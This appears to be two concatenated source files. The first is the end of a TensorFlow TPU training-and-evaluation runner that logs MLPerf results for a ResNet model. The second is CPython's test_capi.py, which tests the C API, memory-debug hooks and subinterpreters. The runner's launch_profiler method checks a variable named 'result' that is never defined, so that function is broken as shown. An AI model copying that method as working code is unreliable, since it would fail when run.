self.eval_feature_structure["labels"] = labels
flattened_inputs = data_nest.flatten(self.eval_feature_structure)
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed = tpu.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
if is_training:
self.infeed_queue.append(infeed)
else:
self.eval_infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn)
return enqueue_ops_fn
if is_training:
with self.input_graph.as_default():
self.enqueue_ops.append(
wrap_computation_in_while_loop(
get_enqueue_ops_fn(),
n=self.iterations,
host_name=self.get_host(host_id),
parallel_iterations=1))
else:
with self.eval_input_graph.as_default():
self.eval_enqueue_ops.append(
wrap_computation_in_while_loop(
get_enqueue_ops_fn(),
host_name=self.get_host(host_id),
n=self.eval_steps,
parallel_iterations=1))
def get_tpu_step(self, mparams, model_fn, is_training=True):
"""Get the TPU graph generation function."""
def tpu_step(loss):
"""Generate the TPU graph."""
del loss
if is_training:
values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)
unflattened_inputs = data_nest.pack_sequence_as(self.feature_structure,
values)
else:
values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)
unflattened_inputs = data_nest.pack_sequence_as(
self.eval_feature_structure, values)
features = unflattened_inputs["features"]
labels = unflattened_inputs["labels"]
if is_training:
estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN,
mparams)
loss, train_op = estimator_spec.loss, estimator_spec.train_op
with tf.device(device_for_tpu_core(self.get_host(0))):
with tf.control_dependencies([train_op]):
return tf.identity(loss)
else:
estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.EVAL,
mparams)
loss = estimator_spec.loss
self.eval_metrics = estimator_spec.eval_metrics
self.eval_tensors = estimator_spec.eval_metrics[1]
for _ in self.eval_tensors:
self.dequeue_ops.append([])
with tf.device(device_for_tpu_core(self.get_host(0))):
outfeed_enqueue_ops = tpu.outfeed_enqueue_tuple(self.eval_tensors)
with tf.control_dependencies([outfeed_enqueue_ops]):
return tf.identity(loss)
return tpu_step
def launch_profiler(self):
"""Launches a profiling session to collect a trace from worker-0."""
if result == profiler_client.PROFILED_IN_NEW_THREAD:
tf.logging.info("A profiler session launched in a new thread.")
else:
tf.logging.info("profiler.collect() failed.")
def initialize(self, train_input_fn, eval_input_fn, model_fn, params):
"""Build graphs for the TPU device and the input pipelines.
Args:
train_input_fn: Dataset input graph generation function for training.
eval_input_fn: Dataset input graph generation function for training.
model_fn: Model definition function
params: Parameters to input and model functions
"""
tf.logging.info("TrainAndEvalRunner: initialize method")
self.build_enqueue_ops(train_input_fn, params, 0)
# Start the build of the model
tpu_step = self.get_tpu_step(params, model_fn)
@tpu_function.on_device_training_loop
def train_loop():
with tf.variable_scope("resnet", reuse=tf.AUTO_REUSE):
return tpu.repeat(self.iterations, tpu_step, [_INITIAL_LOSS])
self.train_loop = train_loop
# Build tpu train model session and initialize graph
self.initialize_eval(params, eval_input_fn, model_fn)
# Build the infeed graph
i = 1
while i < self.num_hosts:
self.build_enqueue_ops(train_input_fn, params, i)
i = i + 1
self.sess = tf.Session(self.master, graph=self.graph, config=self.config)
self.input_sess = tf.Session(
self.master, graph=self.input_graph, config=self.config)
self.input_sess.run(self.dataset_initializer)
self.eval_input_sess = tf.Session(
self.master, graph=self.eval_input_graph, config=self.config)
self.eval_input_sess.run(self.eval_dataset_initializer)
self.eval_output_sess = tf.Session(
self.master, graph=self.eval_output_graph, config=self.config)
with self.graph.as_default():
self.sess.run(tf.global_variables_initializer())
self.sess.run(tf.local_variables_initializer())
def train_eval_thread_fn(sess, train_eval_op):
sess.run([train_eval_op])
# Start the just in time compilation of the model function
self.train_eval_thread = threading.Thread(
target=train_eval_thread_fn, args=(self.sess, self.train_eval_op))
self.train_eval_thread.start()
# Sleep for JTC to finish
time.sleep(60)
def initialize_eval(self, params, eval_input_fn, model_fn):
"""Initialize eval."""
self.eval_infeed_queue = []
for i in range(0, self.num_hosts):
self.build_enqueue_ops(
eval_input_fn, params, host_id=i, is_training=False)
eval_step = self.get_tpu_step(params, model_fn, is_training=False)
@tpu_function.on_device_training_loop
def eval_loop():
with tf.variable_scope("resnet", reuse=tf.AUTO_REUSE):
return tpu.repeat(int(self.eval_steps), eval_step, [_INITIAL_LOSS])
def train_eval_step(loss):
del loss
with tf.control_dependencies(self.train_loop()):
return eval_loop()
@on_device_train_and_eval_loops
def train_eval_loop():
return tpu.repeat(self.max_train_iterations, train_eval_step,
[_INITIAL_LOSS])
def create_dequeue_ops(host_id):
"""Create deque ops graph function."""
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for v in self.eval_tensors:
dequeue_ops.append([])
tensor_dtypes.append(v.dtype)
tensor_shapes.append(v.shape)
for i in range(FLAGS.tpu_cores_per_host):
with tf.device(device_for_host(self.get_host(host_id))):
outfeed_tensors = tpu.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes, device_ordinal=i)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
for j in range(len(outfeed_tensors)):
dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)
return dequeue_ops
with self.graph.as_default():
with tf.variable_scope("resnet", reuse=True):
(self.train_eval_op,) = tpu.shard(
train_eval_loop,
inputs=[],
num_shards=FLAGS.num_cores,
outputs_from_all_shards=False)
graph_io.write_graph(tf.Graph().as_graph_def(add_shapes=True),
FLAGS.model_dir, "graph.pbtxt")
with self.eval_output_graph.as_default():
with tf.variable_scope("resnet", reuse=True):
for i in range(0, self.num_hosts):
host_dequeue_ops = create_dequeue_ops(i)
for j, dequeue_tenor in enumerate(host_dequeue_ops):
self.dequeue_ops[j].append(dequeue_tenor)
for j, _ in enumerate(self.eval_tensors):
self.dequeue_ops[j] = tf.concat(self.dequeue_ops[j], axis=0)
with tf.device(device_for_host(self.get_host(0))):
metrics = self.eval_metrics[0](*self.dequeue_ops)
metric_update_ops = []
metric_value_ops = {}
for (k, v) in metrics.items():
metric_update_ops.append(v[1])
metric_value_ops[k] = v[0]
self.metric_update_ops = metric_update_ops
self.metric_value_ops = metric_value_ops
self.metric_initializer = tf.variables_initializer(
tf.get_collection(tf.GraphKeys.METRIC_VARIABLES))
def train_and_eval(self, output_summaries=False, enable_tracing=True):
"""Run the Train steps on the TPU device."""
if output_summaries:
output_dir = os.path.join(FLAGS.model_dir, "eval")
tf.gfile.MakeDirs(output_dir)
# Summary writer writes out eval metrics.
summary_writer = tf.summary.FileWriter(output_dir)
def infeed_thread_fn():
"""Build and infeed session.run calls in a background thread."""
# Build infeed sesssion
# Run infeed session.run calls
tf.logging.info("Start infeed thread")
for _ in range(self.train_steps // self.iterations):
self.input_sess.run([self.enqueue_ops])
self.eval_input_sess.run([self.eval_enqueue_ops])
self.infeed_thread = threading.Thread(target=infeed_thread_fn)
self.infeed_thread.start()
# Gather trace for the first few steps.
if enable_tracing:
self.launch_profiler()
cur_step = 0
success = False
while cur_step < self.train_steps:
start = time.time()
tf.logging.info("TrainAndEvalRunner: start next %d steps",
self.iterations)
cur_step += self.iterations
epoch = cur_step // self.steps_per_epoch - 1
mlp_log.mlperf_print(
"block_start", None, metadata={"first_epoch_num": epoch + 1,
"epoch_count": 4})
eval_results = self.eval(self.eval_steps)
end = time.time()
tf.logging.info(
"TrainAndEvalRunner: step {} step time {} sec {} examples/sec".format(
cur_step, end - start,
self.iterations * FLAGS.train_batch_size / (end - start)))
# Run eval.
# Write out summary to tensorboard.
if output_summaries:
with tf.Graph().as_default():
summaries = []
for metric in eval_results:
summaries.append(
tf.Summary.Value(tag=metric, simple_value=eval_results[metric]))
tf_summary = tf.Summary(value=list(summaries))
summary_writer.add_summary(tf_summary, cur_step)
# MLPerf logging for eval results.
mlp_log.mlperf_print(
"eval_accuracy",
float(eval_results["top_1_accuracy"]),
metadata={"epoch_num": epoch + 1})
mlp_log.mlperf_print(
"block_stop", None, metadata={"first_epoch_num": epoch + 1})
tf.logging.info("Eval results at step %d: %s", cur_step, eval_results)
if eval_results["top_1_accuracy"] >= FLAGS.stop_threshold:
success = True
mlp_log.mlperf_print("run_stop", None, metadata={"status": "success"})
break
if enable_tracing and cur_step > self.train_steps // 4:
self.launch_profiler()
enable_tracing = False
if not success:
mlp_log.mlperf_print("run_stop", None, metadata={"status": "abort"})
mlp_log.mlperf_print("run_final", None)
if output_summaries:
summary_writer.close()
def eval(self, num_steps):
"""Run the Eval steps on the TPU device.
Args:
num_steps: number of steps to run eval
Returns:
A dictionary of evaluation results.
"""
self.eval_output_sess.run(self.metric_initializer)
eval_results = {}
tf.logging.info("Starting Eval on %d steps batch size %d" %
(num_steps, self.eval_batch_size))
for _ in range(num_steps):
_ = self.eval_output_sess.run(self.metric_update_ops)
# Compute eval metrics
session_out = self.eval_output_sess.run(self.metric_value_ops)
eval_results["top_1_accuracy"] = session_out["top_1_accuracy"]
return eval_results
def shutdown(self):
self.queue.put(_STOP)
self.train_eval_thread.join()
self.infeed_thread.join()
self.sess.close()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned NULL '
br'without setting an error\n'
br'Python runtime state: initialized\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned a result '
br'with an error set\n'
br'Python runtime state: initialized\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
